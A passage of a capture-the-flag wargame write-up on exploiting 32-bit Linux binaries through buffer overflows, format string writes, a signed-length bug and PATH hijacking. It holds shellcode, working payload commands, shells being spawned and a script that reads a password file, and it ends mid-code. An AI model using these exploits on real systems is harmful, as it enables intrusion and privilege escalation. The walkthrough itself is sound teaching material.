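The effect of endianness on this input can be made explicit with struct. This is a sketch in Python 3 and secret_payload is a hypothetical helper name. It assumes, as the text does, that secret sits directly after the 16 bytes of buf.

```python
import struct

def secret_payload(value=0xc0deface, little_endian=True):
    """16 filler bytes for buf followed by the value that lands in secret."""
    fmt = "<I" if little_endian else ">I"
    return b"A" * 16 + struct.pack(fmt, value)

print(secret_payload())                      # little-endian, as on x86
print(secret_payload(little_endian=False))   # big-endian byte order
```

Letting struct.pack order the bytes avoids having to reverse them by hand for every new value.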
  • Controlling the EIP: In the challenge below, an attacker can use a buffer overflow to take control of the program’s execution. The return address for the call to the vuln function sits above buf on the stack, so it can be overwritten by an overflow. This allows an attacker to put nearly any address they desire in place of the return address. In this example, the goal is to call the give_shell function.

  • We need to find the address of give_shell function which can be done either by using gdb and print give_shell or objdump -d outputfile | grep give_shell.

  • To find the EIP offset, you can use cyclic patterns with pattern_create.rb and pattern_offset.rb. For instance, pattern_create.rb 100 creates a 100-byte cyclic pattern.

  • Feed this pattern to the vulnerable program as input and it will crash. Note the value of EIP at that point and pass it to pattern_offset.rb to get the offset.

  • Then, we just need to pass the input to the program by

./a.out $(python -c 'print "A" * Offset + "Address of give_shell in hex"')
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* This never gets called! */
void give_shell(){
     gid_t gid = getegid();
     setresgid(gid, gid, gid);
     system("/bin/sh -i");
}

void vuln(char *input){
     char buf[16];
     strcpy(buf, input);
}

int main(int argc, char **argv){
     if (argc > 1)
        vuln(argv[1]);
        return 0;
}
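To show what the cyclic pattern tools do, here is a rough Python 3 sketch of the same idea. It is not the Metasploit implementation. pattern_create and pattern_offset are hypothetical re-creations that produce an Aa0Aa1Aa2... style pattern and look up a crashed EIP value in it, assuming a little-endian target.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def pattern_create(length):
    """Build an Aa0Aa1Aa2... style pattern of the requested length."""
    out = ""
    for triple in product(ascii_uppercase, ascii_lowercase, digits):
        if len(out) >= length:
            break
        out += "".join(triple)
    return out[:length]

def pattern_offset(eip_value, length=8192):
    """Return the offset of the 4 bytes found in EIP, or -1 if absent."""
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)

pattern = pattern_create(100)
print(pattern[:20])
# Pretend the program crashed with the bytes at offset 76 loaded into EIP
eip = struct.unpack("<I", pattern[76:80].encode())[0]
print(pattern_offset(eip))
```

The offset found this way is the number of filler bytes to send before the address of give_shell.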
  • Execute Me: In the code below, getegid() returns the effective group ID of the calling process and setresgid() sets the real, effective and saved set-group-ID of the calling process. The read function then reads stdin into buf, and ((function_ptr)buf)() calls whatever is in the buffer as code.

  • Since the program executes anything in buf, we need a shellcode that fits in 128 bytes. Plenty of shellcode (for different platforms and purposes) can be found on Shell-Storm.

  • Then, we just need to pass the shellcode to the program on stdin, for example

    (python -c 'print "<shellcode bytes>"'; cat) | ./a.out
    
    #include <stdio.h>
    #include <stdlib.h>
    
    int token = 0;
    
    typedef void (*function_ptr)();
    
    void be_nice_to_people(){
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
    }
    
    int main(int argc, char **argv){
             char buf[128];
    
             be_nice_to_people();
             read(0, buf, 128);
             ((function_ptr)buf)();
     }
    
  • ROP1: This binary is running on a machine with ASLR! (Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks.) Can you bypass it?

  • From the code provided we can see that there’s a buffer overflow in the vuln() function due to the strcpy() call. Run the program within gdb and look at the state of the registers and the stack at the time of the crash.

  • With the cyclic pattern tools, we find that the offset is 76, which can be confirmed by providing an input of 76 “A”s and 4 “B”s to overwrite EIP. Set a breakpoint after the call to strcpy(), that is, at *vuln+24. After the leave and ret instructions are executed, EIP will be set to 0x42424242.

  • EAX points to our buffer of “A”s and, since the binary doesn’t have the NX bit set, we can execute shellcode on the stack. To bypass ASLR, we just need to find an address that will do a JMP/CALL EAX and set that as our return address.

  • Since the binary is compiled for 32 bit, searching Shell-Storm for Linux_x86 shellcode executing /bin/sh, we get a 21-byte shellcode in kernelpanic.

  • As EAX points to the 76 “A”s + BBBB when the vuln function returns, we just need to find an address that executes JMP EAX. It can be found with msfelfscan -j eax binary_file

  • One more small but important observation is the number of NOPs, as our shellcode is 21 bytes and offset is 76 bytes and jmp is 4 bytes. So, 76 - 21 - 4 = 51.

import struct
code = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
jmpeax = struct.pack("<I",0x080483e7)
print "\x90"*51 + code + jmpeax
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void be_nice_to_people(){
     gid_t gid = getegid();
     setresgid(gid, gid, gid);
 }

void vuln(char *name){
     char buf[64];
     strcpy(buf, name);
}

int main(int argc, char **argv){
    be_nice_to_people();
    if(argc > 1)
       vuln(argv[1]);
       return 0;
}

Format String Examples

Let’s see a simple example of a format string vulnerability.

  • Narnia5

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){
     int i = 1; char buffer[64];
     snprintf(buffer, sizeof buffer, argv[1]);
     buffer[sizeof (buffer) - 1] = 0;
     printf("Change i's value from 1 -> 500. ");

     if(i==500){
       printf("GOOD\n");
       system("/bin/sh");
     }

     printf("No way...let me give you a hint!\n");
     printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
     printf ("i = %d (%p)\n", i, &i);
     return 0;
}

Let’s try to see what’s on stack and if we can put something on stack and change the value of i.

narnia5@melinda:~$ /narnia/narnia5 %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.62653766.36656436.6666662e.] (63)
i = 1 (0xffffd6cc)

narnia5@melinda:~$ /narnia/narnia5 AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [AAAAf7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.41414141.62653766.36656] (63)
i = 1 (0xffffd6cc)

narnia5@melinda:~$ /narnia/narnia5 `python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"'`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [����f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8.ffffd6cc.62653766.36656] (63)
i = 1 (0xffffd6cc)

narnia5@melinda:~$ /narnia/narnia5 `python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%08x.%08n.%08x.%08x.%08x"'`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [����f7eb6de6.ffffffff.ffffd6ae.f7e2ebf8..62653766.36656436.6666] (63)
i = 40 (0xffffd6cc)

narnia5@melinda:~$ /narnia/narnia5 `python -c 'print "\xcc\xd6\xff\xff%08x.%08x.%08x.%468x.%08n.%08x.%08x.%08x"'`
Change i's value from 1 -> 500. GOOD
$
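The jump from i = 40 to i = 500 comes from widening one %x until the number of characters printed before %n equals the target. A minimal Python 3 sketch of that arithmetic follows. narnia5_format is a hypothetical helper name, and it assumes, as in the runs above, that our own string shows up as the fifth argument.

```python
import struct

def narnia5_format(target_addr, value, pops=4):
    """Format string whose %n stores `value` at target_addr.

    Assumes the buffer starts at argument pops + 1 and that every
    specifier except the widened one is the 9-character "%08x." form.
    """
    written = 4 + 9 * (pops - 1) + 1   # address + "%08x." repeats + "." before %n
    width = value - written            # characters the widened %x must print
    if width < 8:
        raise ValueError("value too small for this layout")
    fmt = "%08x." * (pops - 1) + "%{}x.".format(width) + "%08n"
    return struct.pack("<I", target_addr) + fmt.encode()

print(narnia5_format(0xffffd6cc, 500))
```

For 500 this yields the same %468x width that was used in the last run: 4 + 27 + 468 + 1 = 500.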
  • In this example, Narnia7, let’s see how to write an arbitrary value to an address.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int goodfunction();
int hackedfunction();

int vuln(const char *format){
        char buffer[128];
        int (*ptrf)();

        memset(buffer, 0, sizeof(buffer));
        printf("goodfunction() = %p\n", goodfunction);
        printf("hackedfunction() = %p\n\n", hackedfunction);

        ptrf = goodfunction;
        printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

        printf("I guess you want to come to the hackedfunction...\n");
        sleep(2);
        ptrf = goodfunction;

        snprintf(buffer, sizeof buffer, format);

        return ptrf();
}

int main(int argc, char **argv){
        if (argc <= 1){
                fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
                exit(-1);
        }
        exit(vuln(argv[1]));
}

int goodfunction(){
        printf("Welcome to the goodfunction, but i said the Hackedfunction..\n");
        fflush(stdout);

        return 0;
}

int hackedfunction(){
        printf("Way to go!!!!");
    fflush(stdout);
        system("/bin/sh");

        return 0;
}

As we can see, the program provides us with the address of the ptrf pointer, of goodfunction and of hackedfunction. ptrf is assigned the address of goodfunction; if we somehow change it to the address of hackedfunction, we get a shell. Let’s run the program and see what addresses we get.

./narnia71 A
goodfunction() = 0x804871f
hackedfunction() = 0x8048745

before : ptrf() = 0x804871f (0xffb4450c)
I guess you want to come to the hackedfunction...
Welcome to the goodfunction, but i said the Hackedfunction..

and

narnia7@melinda:/narnia$ ./narnia7 A
goodfunction() = 0x80486e0
hackedfunction() = 0x8048706

before : ptrf() = 0x80486e0 (0xffffd64c)
I guess you want to come to the hackedfunction...
Welcome to the goodfunction, but i said the Hackedfunction..

The reason I have shown two runs is that in the first one (./narnia71) the two addresses differ only in one byte, 0x1f versus 0x45, whereas in the second one (on melinda) they differ in two bytes, 0x86e0 versus 0x8706. We can write two bytes with %hn and one byte with %hhn. We can also write a whole 4-byte address in two halves, the high-order bytes (HOB) and the low-order bytes (LOB), using the following formula.

If HOB < LOB:

HOB:0x0804
LOB:0x8706

[addr+2][addr] = \x4e\xd6\xff\xff\x4c\xd6\xff\xff
%.[HOB - 8]x   = 0x804 - 8 = 7FC (2044) = %.2044x
%[offset]$hn   = %6\$hn
%.[LOB - HOB]x = 0x8706 - 0x804 = 7F02 (32514) = %.32514x
%[offset+1]$hn = %7\$hn

`python -c 'print "\x4e\xd6\xff\xff\x4c\xd6\xff\xff" +"%.2044x%6\$hn %.32514x%7\$hn"'`
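The HOB/LOB recipe can be wrapped in a small generator. The sketch below is Python 3 and two_short_writes is a hypothetical helper name. It assumes that both halves are larger than 8, that they differ, and that none of the address bytes is a null byte. No separator is placed between the two writes, so the running byte count matches the formula exactly.

```python
import struct

def two_short_writes(addr, value, offset):
    """Build a format string that stores a 32-bit value with two %hn writes.

    `offset` is the argument index at which the start of our own string
    appears on the stack (6 in this example).
    """
    hob, lob = value >> 16, value & 0xffff
    # Write the smaller half first; each half is paired with its destination
    first, second = sorted([(hob, addr + 2), (lob, addr)])
    head = struct.pack("<I", first[1]) + struct.pack("<I", second[1])
    pad1 = first[0] - len(head)        # the 8 address bytes are already counted
    pad2 = second[0] - first[0]        # extra characters needed for the second half
    fmt = "%.{}x%{}$hn%.{}x%{}$hn".format(pad1, offset, pad2, offset + 1)
    return head + fmt.encode()

payload = two_short_writes(0xffffd64c, 0x08048706, 6)
print(payload)
```

Sorting the two halves also covers the case where HOB is larger than LOB, in which the low half is simply written first.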

We also need to find the offset at which our address is stored, which can be done in two ways: either by compiling the program on the local machine and checking the buffer just after snprintf

gdb-peda$ p buffer
$2 = "AAAA.000008a2.f7fdeb58.f7fde860.0804835c.0804871f.41414141.3030302e.61383030", '\000' <repeats 51 times>

or by using ltrace

narnia7@melinda:/narnia$ ltrace ./narnia7 `python -c 'print "AAAA" + ".%08x"*7'`
__libc_start_main(0x804868f, 2, 0xffffd764, 0x8048740 <unfinished ...>
memset(0xffffd620, '\0', 128)                                                                                          = 0xffffd620
printf("goodfunction() = %p\n", 0x80486e0goodfunction() = 0x80486e0
)                                                                             = 27

)                                                                         = 30
printf("before : ptrf() = %p (%p)\n", 0x80486e0, 0xffffd61cbefore : ptrf() = 0x80486e0 (0xffffd61c)
)                                                           = 41
puts("I guess you want to come to the "...I guess you want to come to the hackedfunction...
printf("hackedfunction() = %p\n\n", 0x8048706hackedfunction() = 0x8048706
)                                                                            = 50
sleep(2)                                                                                                               = 0
snprintf("AAAA.08048238.ffffd678.f7ffda94."..., 128, "AAAA.%08x.%08x.%08x.%08x.%08x.%0"..., 0x8048238, 0xffffd678, 0xf7ffda94, 0, 0x80486e0, 0x41414141, 0x3038302e) = 67
puts("Welcome to the goodfunction, but"...Welcome to the goodfunction, but i said the Hackedfunction..
)                                                                            = 61
fflush(0xf7fcaac0)                                                                                                     = 0
exit(0 <no return ...>
+++ exited (status 0) +++

As you can see, 0x41414141 is at offset 6 in both cases.
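Counting the fields by eye is error-prone, so the offset can be computed from the dumped buffer. This is a short Python 3 sketch. find_offset is a hypothetical helper name, and the sample string is the buffer printed by gdb above.

```python
def find_offset(dump, marker="41414141"):
    """Return the 1-based argument index at which `marker` appears in a ".%08x" dump."""
    fields = dump.split(".")[1:]       # drop the leading "AAAA"
    return fields.index(marker) + 1

dump = "AAAA.000008a2.f7fdeb58.f7fde860.0804835c.0804871f.41414141.3030302e.61383030"
print(find_offset(dump))
```

The returned index is the number to use in the %<offset>$hn specifier.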

gdb-peda$ p ptrf
$3 = (int (*)()) 0x804871f <goodfunction>
gdb-peda$ p &ptrf
$4 = (int (**)()) 0xffffd2ec
gdb-peda$ x /10xb 0xfffd3ea
0xfffd3ea:  Cannot access memory at address 0xfffd3ea
gdb-peda$ x /10xb 0xffffd3ea
0xffffd3ea: 0x3f    0x77    0x00    0x00    0x00    0x00    0x00    0x00
0xffffd3f2: 0x00    0x00
gdb-peda$ x /10xb 0xffffd2ea
0xffffd2ea: 0x04    0x08    0x1f    0x87    0x04    0x08    0x41    0x41
0xffffd2f2: 0x41    0x41
gdb-peda$ p goodfunction
$5 = {int ()} 0x804871f <goodfunction>
gdb-peda$ p ha
hackedfunction  hasmntopt
gdb-peda$ p hackedfunction
$6 = {int ()} 0x8048745 <hackedfunction>
gdb-peda$ p &ptrf
$10 = (int (**)()) 0xffffd2fc
gdb-peda$ run `python -c 'print "\xfc\xd2\xff\xff" + ".%08x"*5 + "%hhn"'`
gdb-peda$ p ptrf
$12 = (int (*)()) 0x8048731 <goodfunction+18>
gdb-peda$ x /10xb 0xffffd2fa
0xffffd2fa: 0x04    0x08    0x31    0x87    0x04    0x08    0xfc    0xd2
0xffffd302: 0xff    0xff
  • Let’s see another example, Behemoth3, where we only have the assembly code of the program. We exploit it in two ways: by overwriting the return address or by overwriting a GOT entry.

Assembly Source Code:

(gdb) disassemble main
Dump of assembler code for function main:
   0x0804847d <+0>: push   %ebp
   0x0804847e <+1>: mov    %esp,%ebp
   0x08048480 <+3>: and    $0xfffffff0,%esp
   0x08048483 <+6>: sub    $0xe0,%esp
   0x08048489 <+12>:    movl   $0x8048570,(%esp)
   0x08048490 <+19>:    call   0x8048330 <printf@plt>
   0x08048495 <+24>:    mov    0x80497a4,%eax
   0x0804849a <+29>:    mov    %eax,0x8(%esp)
   0x0804849e <+33>:    movl   $0xc8,0x4(%esp)
   0x080484a6 <+41>:    lea    0x18(%esp),%eax
   0x080484aa <+45>:    mov    %eax,(%esp)
   0x080484ad <+48>:    call   0x8048340 <fgets@plt>
   0x080484b2 <+53>:    movl   $0x8048584,(%esp)
   0x080484b9 <+60>:    call   0x8048330 <printf@plt>
   0x080484be <+65>:    lea    0x18(%esp),%eax
   0x080484c2 <+69>:    mov    %eax,(%esp)
   0x080484c5 <+72>:    call   0x8048330 <printf@plt>
   0x080484ca <+77>:    movl   $0x804858e,(%esp)
   0x080484d1 <+84>:    call   0x8048350 <puts@plt>
   0x080484d6 <+89>:    mov    $0x0,%eax
   0x080484db <+94>:    leave
   0x080484dc <+95>:    ret
End of assembler dump.

Observed Behavior:

behemoth3@melinda:/tmp/rahul3$ ./behemoth3
Identify yourself: HelloCheck123
Welcome, HelloCheck123

aaaand goodbye again.

Well, we tried to provide a very large input at the “Identify yourself” prompt, but it did not give a segmentation fault. Let’s try a format string:

behemoth3@melinda:/tmp/rahul3$ echo `python -c 'print "A"*4 + ".%08x"*7'` | ./behemoth3
Identify yourself: Welcome, AAAA.000000c8.f7fcac20.00000000.00000000.f7ffd000.41414141.3830252e

aaaand goodbye again.

Trying a simple format string gives us the offset of our input (6). Now we can write almost any value to almost any address with our input. Before that, let’s put a shellcode in an environment variable and check its address:

export EGG=`python -c 'print "\x90"*90 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`

Let’s core dump the binary using %s and examine the core. Our shellcode can be reached at 0xffffd8f0

  • Either we can overwrite the return address (main+95): Let’s debug the program, set a breakpoint at main+95 and look at the value at $esp, which will be used to find the return address when the binary is executed without gdb. The value is 0xf7e3ba63, and the location of the return address that needs to be overwritten is 0xffffd65c. Let’s core dump the binary again to see the location of the return address without gdb.

(gdb) find $esp,+2000,0xf7e3ba63
0xffffd66c
1 pattern found.

So, if we overwrite the return address at 0xffffd66c with our shellcode value of 0xffffd8f0, we should get a shell.

python -c 'print "\x5e\xd6\xff\xff\x5c\xd6\xff\xff" +"%.65527x%6$hn %.55503x%7$hn"' > input98

This is a little tricky because we may have to guess the location of the return address outside gdb. The search above gave 0xffffd66c, but we got a shell using 0xffffd65c.

  • Or we can overwrite the puts GOT entry: find the GOT address of puts, which is 0x08049790, and overwrite it with the address of our shellcode:

python -c 'print "\x92\x97\x04\x08\x90\x97\x04\x08" +"%.65527x%6$hn %.55503x%7$hn"'
  • In the code below, if we can somehow set the value of secret to 1337, we get a shell on the system and can read the flag. Also, the printf function directly uses whatever argument is passed by the user as its format string. Using the concepts above, we need to find the address of secret and write to it. The address of secret can be found with gdb or objdump. Either the address is already present on the stack or we can put it there.

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

int secret = 0;

void give_shell(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

int main(int argc, char **argv){
    int *ptr = &secret;
    printf(argv[1]);

    if (secret == 1337){
        give_shell();
    }
    return 0;
}

Reading the address

pico83515@shell:/home/format$ gdb -q format
Reading symbols from format...(no debugging symbols found)...done.
(gdb) p $secret
$1 = void
(gdb) p &secret
$2 = (<data variable, no debug info> *) 0x804a030 <secret>

Now we have to find out whether this address is present on the stack. If not, we can put it on the stack ourselves because of the format string vulnerability.

pico83515@shell:/home/format$ ./format %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
ffffd774.ffffd780.f7e4f39d.f7fc83c4.f7ffd000.0804852b.0804a030.08048520.00000000

We see that the address is present on the stack at the seventh position. Otherwise, we can put it on the stack by

for i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x;echo ;done | grep 4141

What this does is extract particular stack content with “%$i\$x”. As we have seen in DMA, a specifier of the form %<n>$x reads one particular stack position, and $i takes the values from 1 to 256. However, as you add more data, the offset of your original input changes, so go ahead and add 1333 more bytes of data and see what the offset is then. (1337 is what we want to put into secret, and we will already have written four bytes (AAAA), so 1333 + 4 = 1337.)

for i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x%1333u;echo ;done | grep 4141
Offset: 103:AAAA41410074
Offset: 104:AAAA31254141

So we found our A’s again, but they aren’t aligned on the stack. Let’s add two more A’s at the end to see if we can get them to line up.

for i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x%1333uAA;echo ;done | grep 41414141
Offset: 103:AAAA41414141

It looks like the address 0x0804a030 is getting placed in *ptr. That’s the address we need to use in place of our A’s. In order to place the number 1337 into secret’s memory address, we need to use the %n modifier. (%103$n will look at the data located at offset 103 as a memory address, and write the total number of bytes we have written so far into that address.)

pico1139@shell:/home/format$ env -i ./format $(python -c 'print "\x30\xa0\x04\x08"+"%1333u%103$nAA"')
$ id
uid=11066(pico1139) gid=1008(format) groups=1017(picogroup)
$ ls
Makefile flag.txt format format.c
$ cat flag.txt
who_thought_%n_was_a_good_idea?

Otherwise, as the address is already present at the seventh position on the stack, we can also do

pico83515@shell:/home/format$ ./format '%1337u%7$n'

We used DMA to access the memory, so 1337 is written directly to the address held at the 7th position. Otherwise, we can use the basic

./format %08x.%08x.%08x.%08x.%08x.%1292u%n

As you can see, we popped 5 stack positions with %08x, %1292u consumes the 6th position and pads the output up to the value we want to write, and the 7th position contains the address of secret, which %n writes to. Note that “%08x.” prints eight characters plus 1 for the “.”, i.e. 9 bytes. Used five times that is 9*5 = 45 bytes, and 1292 + 45 = 1337.
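The padding widths used in this example all follow from one subtraction, which the Python 3 sketch below spells out. The helper names are hypothetical, and the sketch assumes each %08x prints exactly eight characters, which holds for 32-bit values.

```python
TARGET = 1337   # value that secret must hold

def pad_for_pops(pops, target=TARGET):
    """Width of the final %u when `pops` copies of "%08x." are printed first."""
    return target - pops * len("f7e4f39d.")   # 8 hex digits plus the dot

def pad_after_address(target=TARGET, addr_len=4):
    """Width of %u when the 4-byte address itself is printed first."""
    return target - addr_len

print(pad_for_pops(5), pad_after_address(), pad_for_pops(0))
```

The three results correspond to the %1292u, %1333u and %1337u variants shown above.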

  • In another example below,

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

#define BUFSIZE 256

void greet(int length){
    char buf[BUFSIZE];
    puts("What is your name?");
    read(0, buf, length);
    printf("Hello, %s\n!", buf);
}

void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, char **argv){
    int length;
    be_nice_to_people();

    puts("How long is your name?");
    scanf("%d", &length);

    if(length < BUFSIZE) //don't allow buffer overflow
        greet(length);
    else
        puts("Length was too long!");
}

This program tries to prevent buffer overflows by first asking for the input length; it disregards any input beyond that length. However, the program reads the length with scanf("%d") into a signed int. If we supply -1 as the length, we pass the length < BUFSIZE check, and read() then interprets -1 as a very large unsigned size. readelf -l no_overflow can be used to find out whether there’s any protection on the binary. The stack is executable and, furthermore, ASLR is not enabled. This makes it easy to stick in a shellcode plus a NOP sled and return to an address on the stack

pico1139@shell:/home/no_overflow$ (echo -1; python -c 'print "A"*268+"\xd0\xd6\xff\xff"+"\x90"*200+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'; cat) | ./no_overflow
How long is your name?
What is your name?
Hello, AAAAAAAAAAAAAAAAAAAAAA...snip...

id
uid=11066(pico1139) gid=1007(no_overflow) groups=1017(picogroup)
cat flag.txt
what_is_your_sign
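
The signed/unsigned mismatch and the payload layout from this example can be sketched in Python 3 as follows. The function names are hypothetical, the 32-bit size_t is an assumption based on the 4-byte return address used above, and the offset 268 and address 0xffffd6d0 are simply the values from the command line above, not something the sketch derives.

```python
import struct

BUFSIZE = 256

def passes_check(length):
    """Mirror of the C check `length < BUFSIZE` on a signed int."""
    return length < BUFSIZE

def as_size_t(length, bits=32):
    """What a negative int becomes when converted to an unsigned size_t."""
    return length & ((1 << bits) - 1)

def build_payload(offset, ret_addr, sled_len, shellcode):
    """Filler up to the saved return address, new return address, NOP sled, shellcode."""
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * sled_len + shellcode

# execve("/bin//sh") shellcode bytes copied from the command above
SHELLCODE = (b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f"
             b"\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80")

print(passes_check(-1), hex(as_size_t(-1)))
payload = build_payload(268, 0xffffd6d0, 200, SHELLCODE)
print(len(payload))
```

The return address has to land somewhere inside the NOP sled, which is why a long sled makes the guess more forgiving.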

  • In another example, where the stack is not executable, reading the code shows that we need to change file_name from not_the_flag.txt to flag.txt. In this example, the address of the string “not_the_flag.txt” is provided as 0x08048777. By putting a breakpoint on puts in gdb and examining the bytes that follow that address, we can find the address of the substring flag.txt.

(gdb) br *puts
Breakpoint 1 at 0x8048460
(gdb) run
Starting program: /home/what_the_flag/what_the_flag

Breakpoint 1, 0xf7e81ee0 in puts () from /lib/i386-linux-gnu/libc.so.6
(gdb) x/s 0x08048777
0x8048777:  "not_the_flag.txt"
(gdb) x/s 0x08048778
0x8048778:  "ot_the_flag.txt"
(gdb) x/s 0x08048770
0x8048770:  "le: %s"
(gdb) x/s 0x0804877C
0x804877c:  "he_flag.txt"
(gdb) x/s 0x0804877D
0x804877d:  "e_flag.txt"
(gdb) x/s 0x0804877E
0x804877e:  "_flag.txt"
(gdb) x/s 0x0804877F
0x804877f:  "flag.txt"

The source code of the program:

#include <stdlib.h>
#include <stdio.h>

struct message_data{
    char message[128];
    char password[16];
    char *file_name;
};

void read_file(char *buf, char *file_path, size_t len){
    FILE *file;
    if(file= fopen(file_path, "r")){
        fgets(buf, len, file);
        fclose(file);
    }else{
        sprintf(buf, "Cannot read file: %s", file_path);
    }
}

int main(int argc, char **argv){
    struct message_data data;
    data.file_name = "not_the_flag.txt";

    puts("Enter your password too see the message:");
    gets(data.password);

    if(!strcmp(data.password, "1337_P455W0RD")){
        read_file(data.message, data.file_name, sizeof(data.message));
        puts(data.message);
    }else{
        puts("Incorrect password!");
    }

    return 0;
}

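So we’ll overwrite the file_name pointer with 0x804877f to make the program read flag.txt. From gets()’s manual: gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte (‘\0’). No check for buffer overrun is performed (see BUGS below). Because gets() does not stop at an embedded null byte but strcmp() does, we can send the correct password, a null byte, two filler bytes to reach the end of the 16-byte password field, and then the new pointer value. So by using the following input, we can overwrite the file_name pointer and still provide the correct password: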

1337_P455W0RD
1337_P455W0RD\0aa\x7f\x87\x04\x08
aa\x7f\x87\x04\x08

We use this in the command line to get the flag

pico83515@shell:/home/what_the_flag$ printf "1337_P455W0RD\0bb\x7f\x87\x04\x08" | ./what_the_flag
Enter your password too see the message:
Congratulations! Here is the flag: who_needs_%eip

pico83515@shell:/home/what_the_flag$
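
The same input can be assembled in Python 3, which makes the field sizes explicit. This is a sketch under assumptions: the helper name `build_input` is hypothetical, and it assumes file_name sits immediately after the 16-byte password field with no padding, which is what the working printf input above implies.

```python
import struct

NOT_THE_FLAG = 0x08048777                      # address of "not_the_flag.txt"
FLAG_ADDR = NOT_THE_FLAG + len("not_the_")     # skip 8 characters to reach "flag.txt"

def build_input(password, field_size, new_ptr, filler=b"b"):
    """Password + NUL, filler up to the end of the field, then the new pointer."""
    data = password + b"\x00"                  # strcmp() stops at this NUL
    data += filler * (field_size - len(data))  # reach the end of password[16]
    return data + struct.pack("<I", new_ptr)   # little-endian overwrite of file_name

payload = build_input(b"1337_P455W0RD", 16, FLAG_ADDR)
print(hex(FLAG_ADDR), payload)
```

The payload must not contain a newline byte, because gets() would stop reading there.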

Miscellaneous Examples

Let’s see some miscellaneous examples that are not buffer overflow or format string vulnerabilities.

  • So, we have a binary which when executed gives

behemoth2@melinda:/behemoth$ ./behemoth2
touch: cannot touch '13373': Permission denied

Let’s see what ltrace provides us

behemoth2@melinda:/behemoth$ ltrace ./behemoth2
__libc_start_main(0x804856d, 1, 0xffffd794, 0x8048640 <unfinished ...>
getpid()                                                                                                               = 14118
sprintf("touch 14118", "touch %d", 14118)                                                                              = 11
__lxstat(3, "14118", 0xffffd688)                                                                                       = -1
unlink("14118")                                                                                                        = -1
system("touch 14118"touch: cannot touch '14118': Permission denied
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                 = 256
sleep(2000

Let’s look at a truncated output of disassemble main. getpid gets the PID of the process, sprintf formats the string "touch <pid>" into a buffer, lstat returns the status of the file named after the PID, unlink removes that file, and system runs the command built by sprintf.

(gdb) disassemble main
Dump of assembler code for function main:
   0x08048588 <+27>:    call   0x8048410 <getpid@plt>
   0x080485b3 <+70>:    call   0x8048450 <sprintf@plt>
   0x080485c7 <+90>:    call   0x80486c0 <lstat>
   0x080485df <+114>:   call   0x8048400 <unlink@plt>
   0x080485eb <+126>:   call   0x8048420 <system@plt>
   0x080485f7 <+138>:   call   0x80483e0 <sleep@plt>
   0x08048616 <+169>:   call   0x8048420 <system@plt>
   0x08048635 <+200>:   leave
   0x08048636 <+201>:   ret

If you check the ltrace output

system("touch 14118"touch: cannot touch '14118': Permission denied

touch is being called without an absolute path, so we can take advantage of that. First we’ll create our own executable touch script that prints out the contents of /etc/behemoth_pass/behemoth3. Next, the PATH variable needs to be updated so that the directory containing our script is searched first, which ensures that our touch script is executed and not the actual touch program. For example, with PATH=/tmp:$PATH, /tmp becomes the first location searched for binaries, so a file called /tmp/touch is executed instead of /usr/bin/touch. Below, the script lives in /tmp/rahul2, so that directory is prepended to PATH.

behemoth2@melinda:/tmp/rahul2$ cat touch
cat /etc/behemoth_pass/behemoth3
behemoth2@melinda:/tmp/rahul2$ history | grep PATH
19  history | grep PATH
behemoth2@melinda:/tmp/rahul2$ PATH=/tmp/rahul2:$PATH /behemoth/behemoth2
**********
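
Why the fake touch wins can be checked without touching the real target. The following Python 3 sketch is only an illustration under assumptions: the function name `hijack_resolves_first` is hypothetical, it uses a throwaway temporary directory rather than /tmp/rahul2, and it relies on shutil.which following the same first-match PATH search that the shell applies to a command given without a path.

```python
import os
import shutil
import tempfile

def hijack_resolves_first(command="touch"):
    """Return True if a fake `command` in a prepended directory shadows the real one."""
    with tempfile.TemporaryDirectory() as fake_dir:
        fake = os.path.join(fake_dir, command)
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho hijacked\n")   # harmless stand-in script
        os.chmod(fake, 0o755)                        # must be executable to be picked up
        # Same idea as PATH=/tmp/rahul2:$PATH in the transcript above
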